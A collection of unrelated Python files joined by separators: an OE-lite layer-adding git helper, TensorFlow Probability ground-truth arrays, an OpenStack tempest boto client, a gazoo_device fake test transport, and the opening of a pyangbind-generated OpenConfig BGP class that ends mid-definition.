elif isinstance(node, ExprNodes.ExprNode):
t = node.type
result += "(type=%s)" % repr(t)
elif node.pos:
pos = node.pos
path = pos[0].get_description()
if '/' in path:
path = path.split('/')[-1]
if '\\' in path:
path = path.split('\\')[-1]
result += "(pos=(%s:%s:%s))" % (path, pos[1], pos[2])
return result
if __name__ == "__main__":
import doctest
doctest.testmod()
|
|
import oebakery
import logging
import oelite.util
import oelite.git
import sys
import os
import subprocess
description = "Add layer to manifest helper tool"
arguments = (
("layer", "Name of the layer to add (fx. meta/qt or src/linux)", 0),
)
def add_parser_options(parser):
parser.add_option(
'-d', '--debug',
action="store_true", default=False,
help="Show debug messages")
parser.add_option(
'-t', '--type',
help="Layer type (fx. meta, linux, u-boot or barebox)")
parser.add_option(
'-u', '--url',
help="URL of git repository to use as layer")
parser.add_option(
'-b', '--branch',
help="Branch to use as initial master branch")
parser.add_option(
'-c', '--commit',
help="Commit to use as initial master branch head")
return
def parse_args(options, args):
if options.debug:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
if len(args) != 1:
return "bad argument count: %d (1 required)"%(len(args))
options.layer = args.pop(0)
return
def run(options, args, config):
logging.debug("add-layer.run %s", options)
return add_layer(options)
_dir_stack = []
def pushd(path):
global _dir_stack
_dir_stack.append(os.getcwd())
os.chdir(path)
def popd():
global _dir_stack
os.chdir(_dir_stack.pop())
def add_layer(args):
if not args.type:
if args.layer.startswith('meta/'):
args.type = 'meta'
elif args.layer.startswith('src/'):
if 'linux' in args.layer:
args.type = 'linux'
elif 'u-boot' in args.layer:
args.type = 'u-boot'
elif 'barebox' in args.layer:
args.type = 'barebox'
else:
args.type = 'src'
elif args.layer.startswith('lib/'):
args.type = 'lib'
else:
logging.error("unable determine layer type, please use '-t'")
sys.exit(1)
elif args.type == 'meta' and not args.layer.startswith('meta/'):
args.layer = os.path.join('meta', args.layer)
elif (args.type in ('src', 'linux', 'u-boot', 'barebox')
and not args.layer.startswith('src/')):
args.layer = os.path.join('src', args.layer)
elif args.type == 'lib' and not args.layer.startswith('lib/'):
args.layer = os.path.join('lib', args.layer)
if not args.url:
if args.type == 'meta':
logging.warning("URL not specified, using OE-lite.org")
args.url = "git://oe-lite.org/oe-lite/%s.git"%(
os.path.basename(args.layer))
elif args.type == 'linux':
logging.warning(
"URL not specified, using linux-stable from Greg Kroah-Hartman")
args.url = "git://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git"
elif args.type == 'u-boot':
logging.warning(
"URL not specified, using upstream from DENX")
args.url = "git://git.denx.de/u-boot.git"
elif args.type == 'barebox':
logging.warning(
"URL not specified, using upstream from Pengutronix")
args.url = "git://git.pengutronix.de/git/barebox.git"
else:
logging.error("URL not specified, please use '-u'")
sys.exit(1)
add_submodule(args)
if args.commit:
# FIXME: use oelite.git module to figure out if tag or sha1
args.src_rev = 'commit=%s'%(args.commit)
elif args.branch:
args.src_rev = 'branch=%s'%(args.branch)
else:
args.src_rev = 'branch=HEAD'
if args.type == 'meta':
return add_meta(args)
elif args.type == 'linux':
return add_linux(args)
elif args.type == 'u-boot':
return add_uboot(args)
elif args.type == 'barebox':
return add_barebox(args)
def add_linux(args):
recipe_dir = 'recipes/linux'
recipe_name = os.path.basename(args.layer).replace('_', '-')
add_recipe(os.path.join(recipe_dir, '%s_git.oe'%(recipe_name)),
"Linux recipe for building from remote git repository",
['kernel'], args.url, src_rev=args.src_rev)
add_recipe(os.path.join(recipe_dir, '%s_local.oe'%(recipe_name)),
"Linux recipe for building directly from manifest repository",
['kernel'], 'file://${TOPDIR}/%s', priority=-1)
commit_recipes(args)
def add_uboot(args):
recipe_dir = 'recipes/u-boot'
recipe_name = os.path.basename(args.layer).replace('_', '-')
add_recipe(os.path.join(recipe_dir, '%s_git.oe'%(recipe_name)),
"U-Boot recipe for building from remote git repository",
['u-boot'], args.url, src_rev=args.src_rev)
add_recipe(os.path.join(recipe_dir, '%s_local.oe'%(recipe_name)),
"U-Boot recipe for building directly from manifest repository",
['u-boot'], 'file://${TOPDIR}/%s'%(args.layer), priority=-1)
commit_recipes(args)
def add_barebox(args):
recipe_dir = 'recipes/barebox'
recipe_name = os.path.basename(args.layer).replace('_', '-')
add_recipe(os.path.join(recipe_dir, '%s_git.oe'%(recipe_name)),
"Barebox recipe for building from remote git repository",
['barebox'], args.url, src_rev=args.src_rev)
add_recipe(os.path.join(recipe_dir, '%s_local.oe'%(recipe_name)),
"Barebox recipe for building directly from manifest repository",
['barebox'], 'file://${TOPDIR}/%s'%(args.layer), priority=-1)
commit_recipes(args)
def add_recipe(recipe_file, description, classes, url,
src_rev=None, priority=None):
if not os.path.exists(os.path.dirname(recipe_file)):
os.makedirs(os.path.dirname(recipe_file))
if os.path.exists(recipe_file):
logging.warning('recipe already exists: %s', recipe_file)
return
if url.startswith('git://'):
src_uri = url
elif '://' in url:
protocol, path = url.split('://', 1)
src_uri = 'git://%s;protocol=%s'%(path, protocol)
elif ':' in url:
src_uri = 'git://%s;protocol=ssh'%(url.replace(':', '/'))
elif url.startswith('/'):
src_uri = 'git://%s;protocol=file'%(url)
else:
src_uri = 'git://${TOPDIR}/%s;protocol=file'%(url)
src_dir = os.path.basename(url.strip('/'))
if src_dir.endswith('.git'):
src_dir = src_dir[:-4]
with open(recipe_file, 'w') as recipe:
recipe.write("## %s\n"%(description))
recipe.write("\ninherit %s\n"%(' '.join(classes)))
recipe.write("\nSRC_URI = %r\n"%(src_uri))
if src_rev:
recipe.write("SRC_URI .= ';${SRC_REV}'\nSRC_REV = %r\n"%(src_rev))
recipe.write("S = '${SRC_DIR}/%s'\n"%(src_dir))
if priority:
recipe.write("\nPRIORITY = '%d'\n"%(priority))
cmd = ['git', 'add', recipe_file]
sts = subprocess.call(cmd)
if sts != 0:
logging.error("adding %s to index failed: %d", recipe_file, sts)
sys.exit(1)
def commit_recipes(args):
cmd = ['git', 'commit', '-m', "Add recipes for %s layer"%(args.layer)]
logging.info("Committing recipes to manifest")
sts = subprocess.call(cmd)
if sts != 0:
logging.error("committing recipes failed: %d", sts)
sys.exit(1)
def add_meta(args):
return
def add_submodule(args):
if os.path.exists(args.layer):
logging.error("layer directory already exists: %s", args.layer)
sys.exit(1)
cmd = ['git', 'diff', '--cached', '--shortstat']
staged_changes = subprocess.check_output(cmd)
if staged_changes:
logging.error("index is not clean: %s"%(staged_changes))
sys.exit(1)
cmd = ['git', 'status', '--porcelain']
unstaged_changes = {}
for line in subprocess.check_output(cmd).split('\n'):
if not line:
continue
assert line[2] == ' '
status = line[:2]
filename = line[3:]
if '->' in filename:
p = filename.split('->')
assert len(p) == 2
filename = p[0]
unstaged_changes[filename] = status
if '.gitmodules' in unstaged_changes:
logging.error(".gitmodules is changed")
sys.exit(1)
cmd = ['git', 'submodule', 'add']
if args.branch:
cmd += ['-b', args.branch]
cmd += ['--', args.url, args.layer]
logging.info("Cloning %s", args.url)
sts = subprocess.call(cmd)
if sts != 0:
logging.error("adding submodule failed: %d", sts)
sys.exit(1)
if args.branch and args.branch != 'master':
pushd(args.layer)
cmd = ['git', 'show-ref', '--verify', '--quiet', 'refs/heads/master']
sts = subprocess.call(cmd)
if sts == 0:
cmd = ['git', 'branch', '-d', 'master']
sts = subprocess.call(cmd)
if sts != 0:
logging.error("could not delete master branch: %d", sts)
sys.exit(1)
cmd = ['git', 'branch', '-M', args.branch, 'master']
sts = subprocess.call(cmd)
if sts != 0:
logging.error("could not rename %s branch: %d",
args.branch, sts)
sys.exit(1)
popd()
if args.commit:
pushd(args.layer)
cmd = ['git', 'reset', '--hard', args.commit]
sts = subprocess.call(cmd)
if sts != 0:
logging.error("reset to requested commit failed: %d", sts)
sys.exit(1)
popd()
cmd = ['git', 'add', args.layer]
sts = subprocess.call(cmd)
if sts != 0:
logging.error("adding %s to index failed: %d", args.layer, sts)
sys.exit(1)
with open('.gitmodules', 'r') as gitmodules_file:
gitmodules_lines = gitmodules_file.readlines()
assert args.url in gitmodules_lines[-1]
gitmodules_lines[-1] = "\turl = ./%s\n"%(args.layer)
with open('.gitmodules', 'w') as gitmodules_file:
gitmodules_file.write(''.join(gitmodules_lines))
cmd = ['git', 'add', '.gitmodules']
sts = subprocess.call(cmd)
if sts != 0:
logging.error("adding .gitmodules to index failed: %d", sts)
sys.exit(1)
cmd = ['git', 'commit', '-m', "Add layer %s from %s"%(args.layer, args.url)]
logging.info("Committing new layer to manifest")
sts = subprocess.call(cmd)
if sts != 0:
logging.error("committing new layer failed: %d", sts)
sys.exit(1)
|
|
# Lint as: python3
# Copyright 2020 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
r"""Ground truth values for `synthetic_log_gaussian_cox_process`.
Automatically generated using the command:
```
python -m inference_gym.tools.get_ground_truth \
--target \
synthetic_log_gaussian_cox_process \
--stan_samples \
50000 \
```
"""
import numpy as np
IDENTITY_AMPLITUDE_MEAN = np.array([
0.32072022433999997,
]).reshape(())
IDENTITY_AMPLITUDE_MEAN_STANDARD_ERROR = np.array([
3.0940358102820867e-05,
]).reshape(())
IDENTITY_AMPLITUDE_STANDARD_DEVIATION = np.array([
0.02559753029515912,
]).reshape(())
IDENTITY_LENGTH_SCALE_MEAN = np.array([
0.20118323845504,
]).reshape(())
IDENTITY_LENGTH_SCALE_MEAN_STANDARD_ERROR = np.array([
0.00013817309709052925,
]).reshape(())
IDENTITY_LENGTH_SCALE_STANDARD_DEVIATION = np.array([
0.10701400857692753,
]).reshape(())
IDENTITY_LOG_INTENSITY_MEAN = np.array([
4.20288236326,
4.709207094080001,
4.62233113842,
4.944547228639999,
4.28999354994,
4.39554439676,
4.518892563640001,
4.15161704376,
4.74945860724,
4.427181770020001,
4.6141229693,
4.6048662583599995,
4.75778922404,
4.4900421474600005,
4.5865291818400005,
4.79564131308,
4.508236103019999,
4.304835396380001,
4.416794986,
4.095037292120001,
4.97264671832,
4.17825554262,
4.21719904902,
4.37156110816,
4.59551701196,
4.7252760272600005,
4.84813004802,
4.854912794400001,
4.406343230859999,
5.24489042876,
4.870945183839999,
4.548702735040001,
4.36177244338,
4.17766253032,
4.52816158328,
4.733318624499999,
5.052602071400001,
4.8258750821,
4.700472078440001,
3.990449227399999,
4.7337001052800005,
4.40447427638,
3.9581792201,
5.0218719962,
4.395250676120001,
4.03439999154,
4.3266505539399995,
4.22946238568,
4.034910857519999,
4.36182705406,
4.587829210680001,
4.90518674516,
4.31571661928,
4.3955445199000005,
4.1079588327200005,
5.03507415382,
4.51065169096,
4.49872020478,
4.78889924052,
4.78861489722,
4.59516177668,
4.99802586672,
4.8116544040800004,
4.49050597756,
4.339599036339999,
3.62890155888,
5.0161057071599995,
4.63141923614,
4.2147211353600005,
4.4487148675,
4.489757085519999,
4.97223816018,
4.6920652575599995,
4.278970918920001,
4.7486786793,
4.78899014594,
5.2041679068199995,
4.70833082244,
4.59541683122,
4.811339776559999,
4.4886272641,
4.45720560652,
4.39471775008,
4.71724139846,
4.42751357322,
4.426985393039999,
4.86267490034,
4.16349831328,
4.61321866986,
5.00495364782,
4.4160133517,
4.79712528414,
4.95237454752,
4.885064734559999,
4.519466438299999,
4.37278476326,
4.43848836884,
4.42695140016,
4.4588055957599995,
3.8917194078999997,
]).reshape((100,))
IDENTITY_LOG_INTENSITY_MEAN_STANDARD_ERROR = np.array([
0.00011831364250478179,
9.483775963372658e-05,
9.652919947341661e-05,
8.337013132959046e-05,
0.00011561150079562063,
0.00010717200253882,
0.00010195651375929193,
0.0001205320162422976,
9.386113705433946e-05,
0.00010746117708222189,
9.513196647113554e-05,
9.788679458194594e-05,
9.103376529463737e-05,
0.00010326510138619498,
9.88966852466385e-05,
8.934004537603784e-05,
0.00010153466095540698,
0.00011341184864361979,
0.00010964415651397516,
0.00012587233046143937,
8.054612940151116e-05,
0.0001208952340420302,
0.0001167726254864137,
0.00010886175264306444,
9.966251370592176e-05,
9.151975387587098e-05,
9.11956813155465e-05,
8.806158192058707e-05,
0.0001057966044679052,
7.386607667819403e-05,
8.640334021239735e-05,
9.980389268038452e-05,
0.00010900152016520581,
0.00012343182503907617,
9.896409275657552e-05,
9.129585475941647e-05,
7.822357383232112e-05,
8.941742746090295e-05,
9.276422819334156e-05,
0.0001332885026143371,
9.263219392419513e-05,
0.00010691121303398835,
0.00013319378601692032,
8.031622848606638e-05,
0.00010740888527632254,
0.00012556127772572596,
0.00011235739234055746,
0.00011724283689932499,
0.0001300209041111566,
0.00011035356273550638,
9.844139421649398e-05,
8.529565585944775e-05,
0.00011258795208146118,
0.0001077154245672818,
0.00012255879993124653,
7.963432932840548e-05,
0.00010345149824671217,
0.00010385286473644432,
9.106901844911758e-05,
8.926194698822457e-05,
9.844120678172515e-05,
8.239412733449509e-05,
8.939632403832393e-05,
0.00010380326937392531,
0.00011017393772468167,
0.00015799222533737308,
8.272167433462777e-05,
9.599838779390758e-05,
0.00011808183708636825,
0.00010519763126357752,
0.00010133537536627358,
8.332110715962807e-05,
9.404357584089731e-05,
0.00011398511817799267,
9.07019907244635e-05,
9.053044756076378e-05,
7.431092146436388e-05,
9.272301371240938e-05,
9.824480996540542e-05,
9.036681535652437e-05,
0.00010342078115627951,
0.00010477490079315446,
0.00010682360235771559,
9.329299448876983e-05,
0.00010669140211541223,
0.00010695049618959563,
8.676052428007136e-05,
0.00011979704035683832,
9.957144628501618e-05,
8.420341544476581e-05,
0.00010810136390363441,
8.969483132833031e-05,
8.463437664544033e-05,
8.8071991099268e-05,
0.00010166929387824244,
0.00010817066970815699,
0.00010797349137559893,
0.00010705462630278869,
0.00010644985890669317,
0.0001362107992741312,
]).reshape((100,))
IDENTITY_LOG_INTENSITY_STANDARD_DEVIATION = np.array([
0.11424020705270559,
0.09085377890926327,
0.0947706123941995,
0.08171440426832924,
0.11048535317460287,
0.10488557130753746,
0.09910884038099467,
0.1166271845518286,
0.08954562428893467,
0.1033020945375956,
0.09513698036249041,
0.09545651031461784,
0.0889270832918099,
0.100728391015481,
0.09617227100946373,
0.08775279822730153,
0.09997957787232623,
0.10942354192370314,
0.10425421432893842,
0.12045558357279951,
0.0805327613228001,
0.11612425419280477,
0.11346143626108722,
0.10605810277632668,
0.09598254820482044,
0.09007783983873462,
0.08565835411958048,
0.08525677970349559,
0.10440050505275222,
0.07104242874714885,
0.08437716225945378,
0.09796366895178162,
0.10668161094802979,
0.11550337261218158,
0.09869983807191436,
0.09009157169921114,
0.0774758040246272,
0.08640887715868421,
0.09128935905028154,
0.12576266606540681,
0.09000810503263651,
0.10460385742479912,
0.12751640666016478,
0.0787373617100347,
0.10478715461791699,
0.12328303235109847,
0.10824888714818304,
0.11278854995824572,
0.123028417098343,
0.10625643957760271,
0.09617433994566642,
0.08301524961248957,
0.10868153064048662,
0.10480672163920438,
0.11927463999899772,
0.07817361179600364,
0.09948059241956109,
0.09983189096232159,
0.08771703093072358,
0.08801831245676447,
0.09550957350676731,
0.079605667256235,
0.0870772291434278,
0.10040190863606638,
0.10751864015761466,
0.1483202197391365,
0.07894990560715888,
0.09412742169667297,
0.11385550450939112,
0.10243752435117108,
0.10043828859229889,
0.0805492885380644,
0.09163621755849682,
0.11044100338114146,
0.08949303963019738,
0.08742857162093777,
0.07224612516024854,
0.09105574660435421,
0.09578126932155098,
0.08692790820696102,
0.10047043025126168,
0.10207485577579226,
0.10468509923494321,
0.0905762209706072,
0.10331366001794706,
0.10290507393831791,
0.0848145019712843,
0.116371337143016,
0.095036183094068,
0.07945625086263128,
0.10388664326396169,
0.08727670168391258,
0.0813069994143018,
0.08392577614306619,
0.09922177289150036,
0.10603680577138772,
0.10277141438928934,
0.10364978592149432,
0.10202619870199639,
0.13152269243637876,
]).reshape((100,))
|
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ConfigParser
import contextlib
import types
import urlparse
from tempest import config
from tempest import exceptions
import boto
import boto.ec2
import boto.s3.connection
CONF = config.CONF
class BotoClientBase(object):
ALLOWED_METHODS = set()
def __init__(self, username=None, password=None,
auth_url=None, tenant_name=None,
*args, **kwargs):
self.connection_timeout = str(CONF.boto.http_socket_timeout)
self.num_retries = str(CONF.boto.num_retries)
self.build_timeout = CONF.boto.build_timeout
self.ks_cred = {"username": username,
"password": password,
"auth_url": auth_url,
"tenant_name": tenant_name}
def _keystone_aws_get(self):
import keystoneclient.v2_0.client
keystone = keystoneclient.v2_0.client.Client(**self.ks_cred)
ec2_cred_list = keystone.ec2.list(keystone.auth_user_id)
ec2_cred = None
for cred in ec2_cred_list:
if cred.tenant_id == keystone.auth_tenant_id:
ec2_cred = cred
break
else:
ec2_cred = keystone.ec2.create(keystone.auth_user_id,
keystone.auth_tenant_id)
if not all((ec2_cred, ec2_cred.access, ec2_cred.secret)):
raise exceptions.NotFound("Unable to get access and secret keys")
return ec2_cred
def _config_boto_timeout(self, timeout, retries):
try:
boto.config.add_section("Boto")
except ConfigParser.DuplicateSectionError:
pass
boto.config.set("Boto", "http_socket_timeout", timeout)
boto.config.set("Boto", "num_retries", retries)
def __getattr__(self, name):
"""Automatically creates methods for the allowed methods set."""
if name in self.ALLOWED_METHODS:
def func(self, *args, **kwargs):
with contextlib.closing(self.get_connection()) as conn:
return getattr(conn, name)(*args, **kwargs)
func.__name__ = name
setattr(self, name, types.MethodType(func, self, self.__class__))
setattr(self.__class__, name,
types.MethodType(func, None, self.__class__))
return getattr(self, name)
else:
raise AttributeError(name)
def get_connection(self):
self._config_boto_timeout(self.connection_timeout, self.num_retries)
if not all((self.connection_data["aws_access_key_id"],
self.connection_data["aws_secret_access_key"])):
if all(self.ks_cred.itervalues()):
ec2_cred = self._keystone_aws_get()
self.connection_data["aws_access_key_id"] = \
ec2_cred.access
self.connection_data["aws_secret_access_key"] = \
ec2_cred.secret
else:
raise exceptions.InvalidConfiguration(
"Unable to get access and secret keys")
return self.connect_method(**self.connection_data)
class APIClientEC2(BotoClientBase):
def connect_method(self, *args, **kwargs):
return boto.connect_ec2(*args, **kwargs)
def __init__(self, *args, **kwargs):
super(APIClientEC2, self).__init__(*args, **kwargs)
aws_access = CONF.boto.aws_access
aws_secret = CONF.boto.aws_secret
purl = urlparse.urlparse(CONF.boto.ec2_url)
region_name = CONF.compute.region
if not region_name:
region_name = CONF.identity.region
region = boto.ec2.regioninfo.RegionInfo(name=region_name,
endpoint=purl.hostname)
port = purl.port
if port is None:
if purl.scheme is not "https":
port = 80
else:
port = 443
else:
port = int(port)
self.connection_data = {"aws_access_key_id": aws_access,
"aws_secret_access_key": aws_secret,
"is_secure": purl.scheme == "https",
"region": region,
"host": purl.hostname,
"port": port,
"path": purl.path}
ALLOWED_METHODS = set(('create_key_pair', 'get_key_pair',
'delete_key_pair', 'import_key_pair',
'get_all_key_pairs',
'get_all_tags',
'create_image', 'get_image',
'register_image', 'deregister_image',
'get_all_images', 'get_image_attribute',
'modify_image_attribute', 'reset_image_attribute',
'get_all_kernels',
'create_volume', 'delete_volume',
'get_all_volume_status', 'get_all_volumes',
'get_volume_attribute', 'modify_volume_attribute'
'bundle_instance', 'cancel_spot_instance_requests',
'confirm_product_instanc',
'get_all_instance_status', 'get_all_instances',
'get_all_reserved_instances',
'get_all_spot_instance_requests',
'get_instance_attribute', 'monitor_instance',
'monitor_instances', 'unmonitor_instance',
'unmonitor_instances',
'purchase_reserved_instance_offering',
'reboot_instances', 'request_spot_instances',
'reset_instance_attribute', 'run_instances',
'start_instances', 'stop_instances',
'terminate_instances',
'attach_network_interface', 'attach_volume',
'detach_network_interface', 'detach_volume',
'get_console_output',
'delete_network_interface', 'create_subnet',
'create_network_interface', 'delete_subnet',
'get_all_network_interfaces',
'allocate_address', 'associate_address',
'disassociate_address', 'get_all_addresses',
'release_address',
'create_snapshot', 'delete_snapshot',
'get_all_snapshots', 'get_snapshot_attribute',
'modify_snapshot_attribute',
'reset_snapshot_attribute', 'trim_snapshots',
'get_all_regions', 'get_all_zones',
'get_all_security_groups', 'create_security_group',
'delete_security_group', 'authorize_security_group',
'authorize_security_group_egress',
'revoke_security_group',
'revoke_security_group_egress'))
def get_good_zone(self):
"""
:rtype: BaseString
:return: Returns with the first available zone name
"""
for zone in self.get_all_zones():
# NOTE(afazekas): zone.region_name was None
if (zone.state == "available" and
zone.region.name == self.connection_data["region"].name):
return zone.name
else:
raise IndexError("Don't have a good zone")
class ObjectClientS3(BotoClientBase):
def connect_method(self, *args, **kwargs):
return boto.connect_s3(*args, **kwargs)
def __init__(self, *args, **kwargs):
super(ObjectClientS3, self).__init__(*args, **kwargs)
aws_access = CONF.boto.aws_access
aws_secret = CONF.boto.aws_secret
purl = urlparse.urlparse(CONF.boto.s3_url)
port = purl.port
if port is None:
if purl.scheme is not "https":
port = 80
else:
port = 443
else:
port = int(port)
self.connection_data = {"aws_access_key_id": aws_access,
"aws_secret_access_key": aws_secret,
"is_secure": purl.scheme == "https",
"host": purl.hostname,
"port": port,
"calling_format": boto.s3.connection.
OrdinaryCallingFormat()}
ALLOWED_METHODS = set(('create_bucket', 'delete_bucket', 'generate_url',
'get_all_buckets', 'get_bucket', 'delete_key',
'lookup'))
|
|
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Fake transport for testing Switchboard."""
import copy
import time
from gazoo_device.switchboard import switchboard_process
from gazoo_device.switchboard import transport_properties
from gazoo_device.utility import multiprocessing_utils
EXCEPTION_MESSAGE = "Something bad happened during read"
def _produce_data(byte_rate, bytes_per_second, exit_flag,
generate_raw_log_lines, read_queue):
"""Generates dummy data to imitate reading from a device."""
byte_count = 0
delay = 0.0
line_count = 0
padding = 0
start_time = time.time()
while not exit_flag.is_set():
line_count += 1
if callable(generate_raw_log_lines):
raw_log_line = u"{}{}\n".format(generate_raw_log_lines(), "*" * padding)
else:
raw_log_line = u"{:08d}{}\n".format(line_count, "*" * padding)
byte_count += len(raw_log_line)
bytes_per_second.value = byte_count / (time.time() - start_time)
if bytes_per_second.value > byte_rate:
delay += 0.001
elif bytes_per_second.value < byte_rate:
if delay > 0.0:
delay -= 0.001
else:
padding += 1
time.sleep(delay)
read_queue.put(raw_log_line)
class FakeTransport:
"""Mock Switchboard transport class for testing."""
def __init__(self,
baudrate=115200,
generate_lines=False,
generate_raw_log_lines=None,
fail_open=False,
fail_read=False,
failure_message=EXCEPTION_MESSAGE,
write_read_func=None,
open_on_start=True,
read_only_if_raw_data_queue_enabled=False):
self.comms_address = "/some/serial/path"
self.bytes_per_second = multiprocessing_utils.get_context().Value("f", 0.0)
self.is_open_count = multiprocessing_utils.get_context().Value("i", 0)
self.open_count = multiprocessing_utils.get_context().Value("i", 0)
self.close_count = multiprocessing_utils.get_context().Value("i", 0)
self.read_size = multiprocessing_utils.get_context().Value("i", 0)
self.reads = multiprocessing_utils.get_context().Queue()
self.writes = multiprocessing_utils.get_context().Queue()
self._baudrate = baudrate
self._exit_flag = multiprocessing_utils.get_context().Event()
self._fail_open = fail_open
self._fail_read = fail_read
self._generate_lines = generate_lines
self._generate_raw_log_lines = generate_raw_log_lines
self._properties = {}
self._failure_message = failure_message
self._transport_open = multiprocessing_utils.get_context().Event()
self._write_read_func = write_read_func
self._properties[transport_properties.OPEN_ON_START] = open_on_start
# Note: if using read_only_if_raw_data_queue_enabled flag, your test must
# call bind_raw_data_enabled_method().
self._read_only_if_raw_data_queue_enabled = read_only_if_raw_data_queue_enabled
self._raw_data_queue_enabled_method = None
def __del__(self):
self.close()
def clear_open(self):
if hasattr(self, "_transport_open"):
self._transport_open.clear()
def close(self):
"""Releases resources used by the class."""
try:
if hasattr(self, "_exit_flag"):
self._exit_flag.set()
if hasattr(self, "_generator"):
self._generator.join()
if hasattr(self, "close_count"):
self.close_count.value += 1
if hasattr(self, "_transport_open"):
self.clear_open()
except IOError:
# Test probably failed and canceled the manager Event objects
pass
finally:
# Always manually delete any multiprocess manager attributes so python's
# garbage collector properly runs.
attrs = [
"_raw_data_queue_enabled_method", "bytes_per_second", "is_open_count",
"open_count", "close_count", "read_size", "reads", "writes",
"_properties", "_transport_open"
]
for attr in attrs:
if hasattr(self, attr):
delattr(self, attr)
# Always make "_exit_flag" last attribute to delete
if hasattr(self, "_exit_flag"):
delattr(self, "_exit_flag")
def bind_raw_data_enabled_method(self, transport_process):
"""Add a reference to raw_data_enabled() method of transport_process.
Args:
transport_process (TransportProcess): the transport process using
this fake transport. Required in order to be able to read only
when the raw data queue is enabled to avoid race conditions.
"""
self._raw_data_queue_enabled_method = transport_process.raw_data_enabled
def is_open(self):
result = False
try:
if hasattr(self, "is_open_count"):
self.is_open_count.value += 1
result = self._transport_open.is_set()
except IOError:
# Test probably failed and canceled the manager Event objects
pass
return result
def get_all_properties(self):
return copy.deepcopy(self._properties)
def get_property(self, key, value=None):
if hasattr(self, "_properties"):
if key in self._properties:
return self._properties[key]
return value
def get_property_list(self):
return list(self._properties.keys())
def set_property(self, key, value):
self._properties[key] = value
def open(self):
try:
self.open_count.value += 1
self.set_open()
except IOError:
# Test probably failed and canceled the manager Event objects
pass
if self._fail_open:
raise Exception(self._failure_message)
def set_open(self):
self._transport_open.set()
if self._generate_lines:
self._generator = multiprocessing_utils.get_context().Process(
target=_produce_data,
args=(self._baudrate / 10, self.bytes_per_second, self._exit_flag,
self._generate_raw_log_lines, self.reads))
self.daemon = True
self._generator.start()
def _should_read(self):
return (not self._read_only_if_raw_data_queue_enabled or
(self._read_only_if_raw_data_queue_enabled and
self._raw_data_queue_enabled_method is not None and
self._raw_data_queue_enabled_method()))
def read(self, size=1, timeout=None):
"""Reads from mock read queue or raises an error if fail_read is True."""
try:
self.read_size.value = size
except IOError:
# Test probably failed and canceled the manager Event objects
pass
if self._fail_read:
raise Exception(self._failure_message)
if self._should_read():
return switchboard_process.get_message(self.reads, timeout=timeout)
else:
return None
def write(self, data, timeout=None):
self.writes.put(data, timeout=timeout)
if self._write_read_func:
responses = self._write_read_func(data)
for response in responses:
self.reads.put(response)
def test_method(self, raise_error: bool = False) -> str:
"""A transport method which raises an error if raise_error=True."""
del self # Unused by the mock implementation
if raise_error:
raise RuntimeError("Something failed.")
return "Some return"
|
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/bgp/global/afi-safis/afi-safi/ipv6-unicast/prefix-limit/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: State information relating to the prefix-limit for the
AFI-SAFI
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__max_prefixes",
"__prevent_teardown",
"__shutdown_threshold_pct",
"__restart_timer",
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__max_prefixes = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="max-prefixes",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
self.__prevent_teardown = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="prevent-teardown",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
self.__shutdown_threshold_pct = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..100"]},
),
is_leaf=True,
yang_name="shutdown-threshold-pct",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-types:percentage",
is_config=False,
)
self.__restart_timer = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="restart-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
